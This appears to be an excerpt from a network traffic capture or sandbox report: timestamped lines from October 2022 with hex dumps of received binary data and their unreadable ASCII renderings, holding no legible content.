                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11239INData Raw: 61 71 19 59 6e f6 b9 b6 02 f3 96 9d 0d d5 04 1d 42 f0 94 d3 02 89 5e 75 63 05 44 62 9c 21 c6 57 0f 43 c2 fe f9 89 8d fd 03 5e cb 8a 1c 79 6b cd c4 bc 01 24 60 cc 05 cb 9c 57 91 7b b0 75 6e 60 77 9d 4f e7 c5 06 4e 14 60 68 a5 83 d8 b8 aa cb 42 fc fb 9a 93 54 d6 21 2b 7b a4 02 12 3b 42 6c af a1 1c 5a a2 61 7d 9b b6 e8 10 eb 31 35 ad 45 c3 1f 2e 93 ec 9a 12 8a 77 88 fa 85 be cd dc 0b de 0e 79 4a 7d f3 66 1d bb 25 94 9f 5c 9b a6 43 21 d3 76 70 d3 92 05 7c 88 e9 f7 38 8e 7c 90 90 b7 2d f3 82 73 0a 7a 93 2d 00 4d f4 2c f4 36 25 99 59 8f f9 45 95 0b 5d de 29 3f 55 11 12 80 3d 64 22 8d 31 41 e8 10 70 0b ed 7c 6b 62 3e eb de 4a 39 c7 4b 7c 68 71 54 58 a7 17 ed bb 24 e3 1f b1 c9 c4 64 ba 12 96 ac a2 ee 73 ab ab d6 81 f4 76 f4 db 0a 35 9a 4e df fc 72 f7 10 1d 35 11
                                                                                                                                                                                                                                    Data Ascii: aqYnB^ucDb!WC^yk$`W{un`wON`hBT!+{;BlZa}15E.wyJ}f%\C!vp|8|-sz-M,6%YE])?U=d"1Ap|kb>J9K|hqTX$dsv5Nr5
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11255INData Raw: d5 66 22 c7 a4 e4 7d fd 16 6e 00 1b 69 6c 18 d4 fd 09 eb 6c 88 ee f3 3a 29 5c 8e 89 ac c1 31 8f 14 17 19 d7 8c fa d7 1a bd 29 4e 94 52 31 01 3a e9 66 63 8b 4c bb 2d ba 84 1c 70 59 d6 d8 f4 e3 d0 4c 2f 37 b8 e8 aa 00 e1 47 05 f7 7a c5 3d 28 1a 1a 50 d7 23 8b b0 01 c4 62 47 db 20 d7 2a 69 25 f3 d3 2c 9f c6 28 56 88 a5 38 4f e4 de 4c 1d 84 01 f2 6f 89 13 ab f4 d1 e5 b4 ac 48 9d c4 4f 70 e6 86 5a 6f df 19 b3 cc 01 64 5c a0 18 47 1a 07 90 22 ae ed fb 71 d2 73 12 57 74 0c 7d a1 cf 36 1c 72 82 a9 04 e9 26 22 b3 c9 14 61 26 cc b2 c7 37 4f 70 82 b7 a0 0f c0 fd 67 36 1e 8f cc 91 94 b2 fa 83 fd 9e ac 8b 88 55 71 e7 45 26 f2 e9 be 5c a0 e2 6f fd b9 82 aa 2f cd 8a 34 e1 4a 8c d2 69 93 58 ce 3f 2b c1 78 84 32 22 ad 7b ce 69 0c 76 c6 72 f8 79 3b 4f db 6d b7 6f 21 bb 69
                                                                                                                                                                                                                                    Data Ascii: f"}nill:)\1)NR1:fcL-pYL/7Gz=(P#bG *i%,(V8OLoHOpZod\G"qsWt}6r&"a&7Opg6UqE&\o/4JiX?+x2"{ivry;Omo!i
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11271INData Raw: 4e 94 e1 7a 58 b3 6c 3c da ba e7 3d 89 40 0f 22 7d 60 d9 dd 42 e4 cd 15 5d 3f ef f9 3b 7c ac 85 2c a6 75 a9 b0 7f e1 52 b1 42 d2 39 8e 4d 89 5b 39 32 1d 38 12 89 74 25 30 d5 f9 47 16 00 2d 07 ee fd b3 9c 99 5a 6d fb cc d4 67 fc 33 57 25 07 1c 02 93 e3 0b 12 71 a6 1a 9a 53 62 26 ff 3a 4d c1 f4 2e 87 4e ff fb 40 eb c9 fd 61 93 da a5 ba 2f 1e e6 5a 60 a4 e8 ee a4 77 6c 57 13 97 c4 79 42 9e 1f 4c 7d 76 98 03 6f 9a cf ea 54 c9 01 66 42 7a 2a 41 12 5e e0 f4 f3 ef 26 b5 e0 de b8 44 77 fb 9b ea 56 9c 0d 89 63 64 10 fe 49 fa f2 97 e5 27 01 3e 7a 61 37 71 f6 eb f1 3f 7b 2d 49 c5 b5 a5 ed d5 68 64 f8 58 4b 41 81 0a b0 7f 54 53 40 86 46 55 b7 71 3f bc b6 55 c3 ef 32 55 d7 0d d3 04 8b 3e 1a 0b c8 d5 10 03 96 e4 7b a5 7a 06 f5 9f e0 ad ef ef aa 47 f3 fc 63 86 0d 2e 06
                                                                                                                                                                                                                                    Data Ascii: NzXl<=@"}`B]?;|,uRB9M[928t%0G-Zmg3W%qSb&:M.N@a/Z`wlWyBL}voTfBz*A^&DwVcdI'>za7q?{-IhdXKATS@FUq?U2U>{zGc.
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11287INData Raw: 19 4f 0c 72 08 19 85 b0 7a 10 4b 66 43 8d c6 65 78 95 c5 33 9b 78 28 52 f6 9c 00 40 c4 cb 67 6a 75 c7 35 cb 40 29 b7 88 77 4d af 9a 86 41 69 bc 4d d2 65 38 ff 85 db 48 7a c0 99 4f af 04 35 64 1b 7e 79 a9 1c 41 53 35 7c f6 32 8c 51 13 b2 1a 90 0d ea cc 98 b3 af a4 b6 58 84 16 fd b9 53 d5 5e be 0b f1 a5 cc d5 49 37 d4 aa 10 2f 4d 2e 71 ac 72 93 67 4a ee 2a 0f f5 b9 0d 53 e7 9a b4 34 10 27 9d 15 17 21 ef 82 6a 8c 83 86 57 6a ae cf 3b 8d 17 b8 07 4e 23 61 2e 76 ca 9d 52 5d 50 55 46 32 8c 9f d5 aa a8 23 26 89 d1 3d cc 02 c7 9f ad 79 85 cb 25 c0 6c b8 a1 10 94 5f 42 20 70 e1 f0 e8 f9 c0 80 07 8e ae b9 3b 52 ad 30 62 de c5 12 52 b1 37 ad d6 31 9e b5 3d 33 f8 2b 2b a7 94 54 3b a5 78 32 08 6f 10 1e c5 08 a4 29 66 ea 3c c3 c3 55 66 0b 23 c9 91 1c fa 1f 63 b6 c4 37
                                                                                                                                                                                                                                    Data Ascii: OrzKfCex3x(R@gju5@)wMAiMe8HzO5d~yAS5|2QXS^I7/M.qrgJ*S4'!jWj;N#a.vR]PUF2#&=y%l_B p;R0bR71=3++T;x2o)f<Uf#c7
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11303INData Raw: 59 de 55 50 1e 70 dd a1 5e c8 f0 56 0d d8 83 fd 86 92 96 2b 28 22 65 32 d9 e7 0b d2 89 33 7b 6e 75 a8 2d 22 96 56 7d c3 48 32 ec e7 d4 65 7e 31 1f 28 3d 78 47 60 bd 8b c6 a9 83 ea ee cd 62 e9 39 cd 04 b5 12 a1 c1 2d f3 38 59 da c3 90 66 34 c0 08 cd aa 0a f2 1b 71 de 3a 7b 56 74 15 7f fe 5b 47 a8 cc c7 e4 3c c8 78 87 68 16 af b0 1e f1 cd 71 fb c8 e4 f0 64 3e 40 5a ac c0 72 d1 c8 68 25 02 20 b5 96 c3 c4 85 a0 7d 5f 14 92 46 f3 ab 74 ab 6c 0b 05 25 ba 74 51 1a 84 be a0 83 2d a8 08 2e e6 a6 2b cb e0 8a 3d bf 78 6c 12 9e dd 00 ca 9b 61 a1 29 0b dd 8d a5 d9 1f ab f0 a5 66 63 24 50 16 f9 59 11 48 de 91 59 39 7d 81 43 23 e1 94 42 60 b2 5b 4f b4 e8 ce 56 29 ff 80 fc ad cf 3b ce d8 21 62 c2 df 72 e2 46 21 14 63 3a 08 4d a8 ec 2f e2 8a 4a 93 90 51 ed 62 14 8a 3e 5e
                                                                                                                                                                                                                                    Data Ascii: YUPp^V+("e23{nu-"V}H2e~1(=xG`b9-8Yf4q:{Vt[G<xhqd>@Zrh% }_Ftl%tQ-.+=xla)fc$PYHY9}C#B`[OV);!brF!c:M/JQb>^
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11319INData Raw: bc 14 2e 2d 93 48 ad 6d 2f f3 06 a7 f1 2b 23 66 60 ef b9 42 de 6d d8 fa ce 81 c9 16 05 5b 22 ba e7 4d f7 e9 f9 bf 93 ac 2d 62 ab 2f 4a 04 0e 15 a4 91 f8 8f ac e0 38 a9 bb b9 a8 ad fb 02 41 c5 13 6b 2a 6d e3 22 39 8f 75 b9 39 3c e1 04 84 52 91 d8 f4 08 3a 87 d0 09 d2 58 fd 38 8f 19 12 d9 a4 6b 8c b0 f2 12 1a f9 87 b7 b1 15 28 d5 5c ae c8 b5 86 b7 43 30 a5 8d e2 c4 1e 7c 5b 1d 6d 7d ce 92 25 4d 6c c8 f9 35 68 90 72 9c 70 dd 04 00 b9 03 c1 c4 b0 2b e9 f4 1c 38 46 36 02 c5 63 c5 3d be 6e 9b 5d 7a e1 ae 90 9f b4 50 de cd fa 19 31 d9 be f8 af 67 26 62 ae 08 ab d0 3e 6a a0 8b f3 47 aa 26 de 7a 01 4a bb 56 7b cc 0f a9 d5 fd 19 00 56 b1 df 55 46 c5 cc a1 13 bf 0c a5 c8 ba af 10 82 fc f5 51 6d 32 63 cd eb 9c a4 c4 9d 1e db 87 05 df 6f 54 65 2b f7 cb 6a e0 8d 8a ac
                                                                                                                                                                                                                                    Data Ascii: .-Hm/+#f`Bm["M-b/J8Ak*m"9u9<R:X8k(\C0|[m}%Ml5hrp+8F6c=n]zP1g&b>jG&zJV{VUFQm2coTe+j
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11335INData Raw: 0c 89 36 c1 0d f4 f0 a4 91 17 e9 08 a8 8f 4d 5f ad a3 d1 5c cd 48 c2 a7 5c 51 2a 3d f1 fe d8 13 07 93 44 09 da db 37 c4 12 fe 49 83 c6 29 77 f6 61 e3 be b5 8d b2 85 6e 90 3e 26 35 60 99 88 19 91 7b 31 8e 3a 8b 66 d8 93 d7 4d b2 7d f1 3b 31 4b 53 a2 8f 9e 3f 41 ee 9c ad 15 a9 36 92 44 c0 fb 8c 58 b2 16 cc bd cd 1c ba ef 04 a8 1b ef 2a 90 92 7f cf 9e 1a 57 5a 11 c4 b9 8f 4b 94 50 72 34 2a df f6 f2 9c 58 1f 75 8b 3a e3 67 7a 64 2a d4 a9 9f b1 0b 33 ba 37 9b fd 66 51 e8 bf d9 a7 c4 f8 c2 a1 c3 8e e1 69 2d ec 4f 04 3b 65 cc 24 12 83 26 00 74 31 eb a9 64 07 27 92 a7 2b 72 5b 4b 3f 34 27 b9 a3 01 9f bf 5c 99 c4 40 d5 43 b1 ab 46 7a b8 b5 2d cc 1f ae 25 ec 97 00 60 59 76 13 a2 97 27 a9 5a 13 5e 67 f9 cc 6e 48 e9 ad 5b 83 f4 1d 55 85 34 41 27 da d6 dc 4d fc 07 f4
                                                                                                                                                                                                                                    Data Ascii: 6M_\H\Q*=D7I)wan>&5`{1:fM};1KS?A6DX*WZKPr4*Xu:gzd*37fQi-O;e$&t1d'+r[K?4'\@CFz-%`Yv'Z^gnH[U4A'M
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11351INData Raw: 4e 0e 98 f4 d9 f6 af 60 d2 25 83 0d 6f c0 a6 52 4f 02 f8 8e 2f c4 49 ea 5d 91 69 30 0e b1 7b b9 98 68 db 17 ec dc 8e 98 3f 6d cf a8 7f 34 41 23 07 a7 08 09 0d 02 e3 9a f9 31 73 d6 89 16 14 2c 61 51 3d 04 88 a3 8c bc b7 0b af be b3 a3 40 58 64 c4 05 f9 d1 57 22 8c 32 51 6e 4e ec 9a 67 e2 95 43 e1 43 61 42 e4 e0 88 bc a2 16 42 46 4d 32 bf ab 59 96 78 87 87 a3 b8 96 a5 1e 70 80 41 95 97 df e7 03 50 7a f4 c3 52 99 9d 81 e1 7b b4 32 f7 da 3e 62 a5 d0 3b cd c9 9c 24 3e 5c 09 74 e9 97 ff 70 e5 36 a0 05 67 57 79 dd e8 10 8b 85 ca 9c fb 63 97 e8 25 29 5b de d1 b8 95 9a c8 52 f2 45 24 34 91 1f 64 83 c0 19 c5 e6 4c fb a9 38 45 c8 e3 7d 5f f2 bd ba a4 dd f5 8c f3 b3 b9 d7 62 c8 33 14 1d 97 20 8f ee 64 e8 76 81 21 80 c5 44 a0 24 50 57 02 2f 2b 72 08 fa 0a 5e 99 03 33
                                                                                                                                                                                                                                    Data Ascii: N`%oRO/I]i0{h?m4A#1s,aQ=@XdW"2QnNgCCaBBFM2YxpAPzR{2>b;$>\tp6gWyc%)[RE$4dL8E}_b3 dv!D$PW/+r^3
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11367INData Raw: 6c 94 66 88 3c d0 91 d9 f6 56 72 04 c8 a5 a5 4c f4 d4 59 23 cf f8 d5 bc e4 84 59 00 e3 a2 cb 8a 5c db 1d aa 57 ae 58 b9 48 ba 99 c8 e1 c6 34 29 d3 e3 1b f2 d8 64 b9 d2 ce 28 03 c8 5a fd 7a cf 25 79 eb 6a 41 9f 93 05 01 a5 2b 6a fe e6 64 e1 47 12 8d 92 5a 38 ea 5d e2 87 0a a2 3f 73 80 a9 05 69 0a 3a 08 3b 99 65 c3 a9 b7 fd 07 ab 05 32 41 f9 bc cc 41 69 37 d5 f7 3e 9c 43 24 85 8e 33 a6 ed ae be f1 77 34 01 02 18 3a a5 ad 27 56 be a1 6a 02 16 7d 10 53 d7 a5 29 b0 b6 c4 6c 82 de bd 97 f0 fd a0 8b 30 f6 4b 0d f6 39 19 77 f0 d4 a6 dd 5d e3 82 22 88 12 93 f7 b2 e0 1a 8a 37 69 77 eb 13 11 e7 34 21 c0 9d 0b 4c b6 3b dc b8 4c 25 08 04 75 e4 53 e5 79 46 8b 26 72 3d 7f 78 01 67 97 da 63 3e a2 9e cf 33 b0 64 f9 81 cd e4 fa 14 3d 03 90 2c b4 e6 fa 83 9c 63 a5 99 02 d7
                                                                                                                                                                                                                                    Data Ascii: lf<VrLY#Y\WXH4)d(Zz%yjA+jdGZ8]?si:;e2AAi7>C$3w4:'Vj}S)l0K9w]"7iw4!L;L%uSyF&r=xgc>3d=,c
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11383INData Raw: 72 1b b6 8b 05 13 87 a8 38 51 a0 59 eb 95 ef f7 04 61 cc 5b ea b1 18 c4 be ac 7f a1 0a 14 81 1e 07 64 95 10 04 14 5e be 36 ac 63 94 91 be 8a 04 1c 5c dc 2c 77 21 05 6b e0 ae 98 cc 9f ec 99 e1 49 36 91 29 9e 86 30 66 86 58 60 a7 d5 fb 1a 54 97 a1 99 fd 66 1f 67 1a 70 a2 8e fd 2d 4e e9 f3 8f 7f e3 46 50 d4 36 c4 bb 81 79 2c dd 8a e2 67 60 41 8b 80 16 08 79 42 0b 77 de 2c 55 38 a8 b8 9b 68 57 ca 98 15 dd 3b 77 b4 0b a5 6d f0 2a 60 62 3e 16 e9 c4 c2 46 65 4b 91 78 59 e7 4d 6f 89 e4 da 45 69 a2 eb 69 bf 59 bc c5 15 cc 38 90 7e d3 82 fa 77 ef e5 ea e7 62 a7 1c 44 6b ad 09 03 15 60 aa b6 6d f4 b1 49 d9 8b 5b df 6f 0a bd c1 1a 18 26 6a bb a2 c6 e2 e8 b0 df 24 34 00 f3 ac 39 70 c3 b3 1d c6 75 58 e9 f4 c0 91 c6 aa 19 c3 21 6d e3 70 1a ca f5 06 92 66 d7 39 25 f0 0b
                                                                                                                                                                                                                                    Data Ascii: r8QYa[d^6c\,w!kI6)0fX`Tfgp-NFP6y,g`AyBw,U8hW;wm*`b>FeKxYMoEiiY8~wbDk`mI[o&j$49puX!mpf9%
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11399INData Raw: 21 0d 0d 64 a4 98 64 36 79 57 7e 53 7d 0d 80 c7 37 ad dd 4e 59 a5 2f 53 e6 2d 87 a2 11 aa 5d 90 a7 ff a8 e0 97 a8 9a 14 a7 42 30 24 00 82 28 7f 15 98 a3 ce 91 2c 62 95 1f f9 fb b2 e4 70 a8 fa 72 4a 00 81 98 f1 20 9d 3f 75 6d d0 71 a7 38 0d 04 06 63 28 0e 67 c4 e5 e7 53 1b 6b 35 91 31 4f 77 d4 77 cc e2 2b ab f9 3d bb 4f ee d9 b4 d9 bb 96 a2 82 7c 2c 23 70 da ef 97 14 f9 40 c5 34 3c b5 fd 26 4a b8 6f 97 ba ca 14 73 d6 30 d9 46 fb ba ce 82 14 30 45 70 ad 5f 15 8e ea eb b4 11 dd 9a 86 3e cc 14 75 d6 9b 41 f4 87 20 35 3e c3 f9 63 ea f2 81 7b b8 85 eb a1 64 24 08 8d 09 b1 7e 9c bf 03 62 5a 67 30 d2 73 42 f2 5e 58 01 90 07 04 d6 b8 0a 65 20 ad 0a 15 b5 31 0d 4c 0e 1f d1 d3 3b 2f ea be 2d de 5d 5f b8 70 88 e7 62 07 7a fa 70 99 a2 ce eb df 12 49 3a 96 30 e4 f9 43
                                                                                                                                                                                                                                    Data Ascii: !dd6yW~S}7NY/S-]B0$(,bprJ ?umq8c(gSk51Oww+=O|,#p@4<&Jos0F0Ep_>uA 5>c{d$~bZg0sB^Xe 1L;/-]_pbzpI:0C
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11415INData Raw: ea 84 07 25 a9 c2 6a ef e9 2b 71 b1 86 07 65 e4 77 bf 40 69 76 83 df c7 fa a9 b5 22 9a 0c 18 a3 7e 02 b1 87 24 09 c3 70 01 cf e6 7c 90 af 91 34 63 89 2d 5c 68 34 cd 84 93 27 8d 71 21 e2 e3 7c c5 62 84 50 59 ac 44 11 3d db 7e 7f 0f b0 d0 0a 4e 70 e6 ee ae fa 65 4a cc cd e7 83 17 61 b7 0a 4e de 56 07 41 94 6f 62 65 b7 23 93 bb e9 ea 41 6f 38 1d 0b cd 7c 0e 56 47 23 9e 95 02 fa 64 26 9f 47 29 4e da bc 01 8d 8c da e3 d7 70 7e 92 7f b3 b2 8e bb c8 a7 c3 aa 09 18 2b 4b da 85 04 71 33 34 7b 0a a4 29 7a 91 e4 29 a6 cf 26 8b 77 8a 6d 75 f8 4c 5f 96 96 d7 0c df 6c 06 b6 29 19 42 23 74 14 42 de 4d 6c e8 1c d9 52 a4 47 58 06 48 67 d4 50 f8 75 5c f9 0c 81 a6 76 b6 6f cc 36 ce 87 43 09 13 7a d8 3e c7 53 36 f3 6b 23 cf 93 4f e9 0f 27 60 48 b6 e8 4d f4 ed 40 69 d2 32 77
                                                                                                                                                                                                                                    Data Ascii: %j+qew@iv"~$p|4c-\h4'q!|bPYD=~NpeJaNVAobe#Ao8|VG#d&G)Np~+Kq34{)z)&wmuL_l)B#tBMlRGXHgPu\vo6Cz>S6k#O'`HM@i2w
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11431INData Raw: 0b ba ae 31 72 b3 dc 2c dd d8 3b 41 9b 70 39 5c f9 19 91 60 54 59 76 2c 86 bd 7d 80 b9 e4 bd 21 65 5c ff 6b f3 8f 91 ef 81 5c 76 f0 03 95 c8 f7 5f c3 f1 32 4f db 40 3d 60 31 e6 88 5b 80 21 82 82 47 81 24 6d f3 f8 a6 ba c7 10 d3 f1 1c f6 45 8b f0 8f 75 e9 43 66 96 7a 2b 7d c3 fc 8c cc 30 87 34 4c 20 51 d3 4a 74 a4 fe 59 77 fd ad 44 f3 8e d2 a6 27 46 5b a9 20 ec e5 3e 99 9e f4 fa 64 d9 d5 49 ca c5 12 c6 87 db 64 6e 36 c9 80 7f 2e 65 6f 4f e7 a6 6f 13 76 9a 54 34 3b 7b f9 65 37 51 82 06 eb 4b e9 db 25 fd d0 0c 28 f1 a0 0a c0 1b 28 67 78 77 24 57 34 60 9a dc df af 8e 83 10 c8 57 1d 85 c5 08 99 8b 47 19 c1 c4 28 ef 5d 45 b6 46 4c 01 af 7e 80 90 4a 6d ba c9 53 5c a3 f4 36 32 1e 2f b1 8e 8c 0a db a0 72 76 a0 85 07 8d 30 0b d0 e7 c9 3b 2c 72 39 ca 3c b9 e7 31 d5
                                                                                                                                                                                                                                    Data Ascii: 1r,;Ap9\`TYv,}!e\k\v_2O@=`1[!G$mEuCfz+}04L QJtYwD'F[ >dIdn6.eoOovT4;{e7QK%((gxw$W4`WG(]EFL~JmS\62/rv0;,r9<1
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11447INData Raw: 7f ed e2 56 06 43 e3 d8 ee 0c 6b 5c cc 4a 59 e3 b7 18 49 41 0a 7d 69 e0 6b 68 d9 61 2e 2a ba 7e 75 ea 2c e3 ce a6 02 70 94 97 a1 c5 82 18 f7 04 49 14 44 ad c3 19 d8 63 bd 7e d1 8b 7d 67 b6 e2 fa e4 b3 3d ac 0b eb 52 df f2 a3 d2 47 ef 50 5a 4c 95 60 94 5c 42 2a 2c 9b 3d 0c 99 cb de e6 d4 8a e8 5e ec dd 32 da b9 8c 0b 90 29 78 12 0d 3a aa dd 82 5b 4d 0e f2 76 6e 9d 8a 90 b2 b2 30 86 53 e3 99 3a 29 49 9d 81 ac 94 3e 10 97 60 30 06 5a c9 28 70 77 3a 8e 2e eb 87 3b 7c 9c ea dc 7d ba 4a 92 90 fb 5f e4 97 51 f6 ae b2 41 d7 ee 9a 96 c8 1f 21 c1 66 e4 8f fa 07 a6 93 d0 45 18 a9 08 9c 4e ae 8c de 9e db 28 8a 04 ec b0 82 6f 31 c2 fc c3 9a 5f 99 09 1a 7d 70 80 01 6b 78 ab 02 88 35 79 20 bd 95 7e 19 86 4a ec 0f 8f d4 dc 1b c2 be ec b5 14 91 78 52 72 f1 3a 51 cb c2 80
                                                                                                                                                                                                                                    Data Ascii: VCk\JYIA}ikha.*~u,pIDc~}g=RGPZL`\B*,=^2)x:[Mvn0S:)I>`0Z(pw:.;|}J_QA!fEN(o1_}pkx5y ~JxRr:Q
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11463INData Raw: b5 4b 18 70 0c 30 a9 be da af 21 b0 61 46 0d d6 1d 82 bf 49 ab 9f b2 b0 40 5e 35 d8 65 6c 43 47 82 71 d9 dd a6 9b be 46 45 89 78 f7 b8 b6 0d 45 ef ff 62 6d dc 2b 3a bc 80 73 39 bc 68 40 2e cf f4 80 b1 c3 75 d5 98 03 3b 46 52 08 2b 86 10 8f 9f e4 85 65 b6 42 25 95 3a 61 f9 f8 3a e1 e6 f4 59 79 bf f0 be 33 da 9e a9 cf 09 10 21 d2 e9 ac 70 f5 ea 36 27 95 2a 1e c3 98 74 96 f6 75 b8 5c b4 5c a8 b4 53 9e 6c 65 69 41 22 9d 64 53 b7 47 b0 af 85 0c a5 62 a5 65 1b 14 67 f1 9f 4b 11 d4 3d e2 77 7a a5 ab dd 29 67 10 ae 56 b9 3a 70 9a ce e2 31 22 0c 41 28 d7 de 25 1f 25 13 25 b9 9a d5 fc 08 e3 b9 f2 3f db 22 2c 66 bf 6a 5f e9 4f 2a aa 2d 45 6a 66 be 2d 63 82 52 20 2c 90 21 67 8a 93 4b fd df 92 d6 97 8e 90 0f 0c 73 de 66 4c 9e e4 0e c4 f5 bc 04 d7 b5 03 16 cd e0 dc c4
                                                                                                                                                                                                                                    Data Ascii: Kp0!aFI@^5elCGqFExEbm+:s9h@.u;FR+eB%:a:Yy3!p6'*tu\\SleiA"dSGbegK=wz)gV:p1"A(%%%?",fj_O*-Ejf-cR ,!gKsfL
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11479INData Raw: 49 d4 63 78 25 ef fc 41 69 38 de c8 9b 0a 7e 8d e2 8e 39 79 90 69 58 50 b9 ca 27 45 99 37 0d b0 44 a8 e1 e3 16 1f 54 bf 8c f1 18 17 97 1a 1d 7c 4e b2 fd 28 11 4a 20 0b cc 68 4e e5 96 d5 3f c0 87 a8 b4 4c ee 4d 4c 5e c9 96 90 d7 52 ec 79 43 34 d0 9d 19 65 a1 cd c7 8d d9 c3 2b 96 30 4a 4a 9f 5e 66 d4 6a 49 0e f3 89 83 cd d1 32 d0 30 94 d8 8b e9 96 0d 26 b2 d5 2f ea 29 ce c4 b0 0c a4 72 fe 8b ec fe 50 62 46 26 69 93 ad e1 60 d0 f4 15 63 af a9 e9 62 03 73 7c 0f f9 4a 68 09 5d b0 87 28 0b 3f d7 51 38 04 9a a5 0f aa fd 95 e7 4a 69 cb e4 30 50 f7 79 af ef bd 14 7e 39 d6 f2 03 d3 fb a9 8e da 5c 5e be f8 c2 11 eb 4d 75 f4 e5 63 3a 34 64 81 36 0a fa 83 5f 3e b7 b8 9d 57 1d 14 65 21 c3 ba 7b ab 5a 01 f9 98 ac ac 0c 6b 9a 04 5c 81 2c 8b b4 15 eb 67 91 c8 ea 00 ee 65
                                                                                                                                                                                                                                    Data Ascii: Icx%Ai8~9yiXP'E7DT|N(J hN?LML^RyC4e+0JJ^fjI20&/)rPbF&i`cbs|Jh](?Q8Ji0Py~9\^Muc:4d6_>We!{Zk\,ge
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11495INData Raw: 1d 95 b5 30 68 18 86 73 60 a0 68 18 72 8e fa da 34 0b 5b 23 7f d8 7e b5 ed 91 02 a3 20 08 39 08 c1 5b 91 bd bf cc 2f 54 6d f5 43 e6 8a 32 87 75 2b 98 e5 09 ef fd bb d1 65 aa b2 fc 30 5f 46 95 ad 93 c9 cf 10 95 54 74 37 2a 22 5a 4f 26 b5 9d 7a 89 02 22 11 f4 37 44 bb 19 0e 95 1c 49 a0 07 7b 17 5a 66 8b 78 92 69 06 18 17 95 73 c2 29 8b 38 6c 73 e6 73 49 51 53 bc 41 ca 88 b0 b0 b3 90 71 1a fb 0d 02 fc 02 6b 78 bb af 1b 0e bc fa 80 de 91 54 cf f3 04 4f 07 d3 7e c1 9e f1 8e 46 e2 10 03 d3 1b 88 54 4b 4b 6a a7 75 ef ca 9c b5 38 07 c1 80 d8 0d ff a4 7e b9 a2 93 b4 9a 9a e6 52 34 b2 d5 8d 26 da f8 ec 7d 99 18 1b 2a db c5 cf 71 39 cc 9b 39 55 5e 92 07 28 29 3a 18 98 22 13 83 28 b3 5f 47 54 84 ab da 54 e5 72 15 19 c1 fb 50 30 f6 e6 82 16 30 a7 59 e1 38 e6 bf 34 0e
                                                                                                                                                                                                                                    Data Ascii: 0hs`hr4[#~ 9[/TmC2u+e0_FTt7*"ZO&z"7DI{Zfxis)8lssIQSAqkxTO~FTKKju8~R4&}*q99U^():"(_GTTrP00Y84
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11511INData Raw: 75 41 46 f2 70 73 a0 d0 7b 37 8b ab da 4d 82 82 52 e2 a5 a3 7f 93 35 2c d0 03 86 a3 09 ae ea 10 ae 2c 68 ff 06 4f de 88 f9 33 6b 07 ed 52 03 cc 05 7f d8 95 28 b4 07 64 c7 f1 72 4f 9f f2 32 7b a1 ac 87 c2 73 05 b9 b5 7c 80 c0 c0 c4 af bb bf 4a 28 c0 1c 7c 63 cf cb de 57 f8 59 25 4d db 8f 69 89 81 f2 6e 3d cf 11 d8 84 5b de f2 e0 84 ba 73 aa 83 6e 4d c5 83 82 56 0d 11 fd a8 54 79 60 ff 0f d8 fd 5c e3 ff af 08 e5 b9 bd 51 c6 95 db 00 08 61 29 00 74 16 ff d2 b8 1c 00 a4 ae 5a 75 71 24 2e a7 46 d7 52 f2 ad 0b c5 3d ea 6a 83 53 49 48 09 a7 d7 52 19 2b 88 bd a6 ee 30 5f 68 90 18 f6 77 be 94 b0 01 29 66 5f bd 59 d8 db 93 77 ed 63 93 f3 d9 47 45 e4 71 96 68 5a 12 0f a7 33 c7 23 a8 8b d7 64 f8 74 39 9d 3d d3 7b ef ec 24 b6 84 bf 81 51 48 9f 79 60 ee 8e 34 d4 32 55
                                                                                                                                                                                                                                    Data Ascii: uAFps{7MR5,,hO3kR(drO2{s|J(|cWY%Min=[snMVTy`\Qa)tZuq$.FR=jSIHR+0_hw)f_YwcGEqhZ3#dt9={$QHy`42U
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11527INData Raw: 9a 93 b4 75 d6 52 c5 8f cb e4 80 46 51 0a 86 41 ff 75 b5 15 77 c7 4b 8f 69 f1 f0 5d 39 8e 25 c1 6b 18 c4 60 0b 0f 71 ca 60 c0 cf 5d a7 60 6f c6 96 0f d5 ee 49 a9 51 22 a1 74 4c 8a 53 0a 62 e3 fa a0 c4 56 79 c7 78 5d 5b 14 83 5e 4d ab c5 a0 45 cf 74 cb ec 35 55 06 e2 71 7d 4e 2d 58 ad 51 dd 9f 5d c9 f4 83 62 86 2d ca a8 f2 a9 98 f4 75 e9 86 98 52 f9 f6 eb 38 2e 4c 15 3a 4d 12 ff 3e 0b 67 91 07 78 a4 eb 73 dd 15 a7 cf a0 8c ba a1 61 04 57 3b f1 ba 7a 38 b4 93 5f 70 ae e3 a0 42 e9 90 7f fd 19 08 4c 77 0e 94 4e 82 b1 db 6a 1b 39 fc dc 80 9e a3 a7 c7 96 ac 45 9a 8e d8 bf 2b c4 4b 55 3e 32 ea 33 36 71 65 b3 aa 1f a3 68 67 0b 26 4e 3c 0f 92 38 b0 93 0b a7 a9 39 a2 a0 8c 3c a1 6a 16 9b c5 f7 7e e5 12 55 07 2b 43 5a 8f 74 8b b3 1e ec 17 24 66 25 21 8f d6 dc 1b 0e
                                                                                                                                                                                                                                    Data Ascii: uRFQAuwKi]9%k`q`]`oIQ"tLSbVyx][^MEt5Uq}N-XQ]b-uR8.L:M>gxsaW;z8_pBLwNj9E+KU>236qehg&N<89<j~U+CZt$f%!
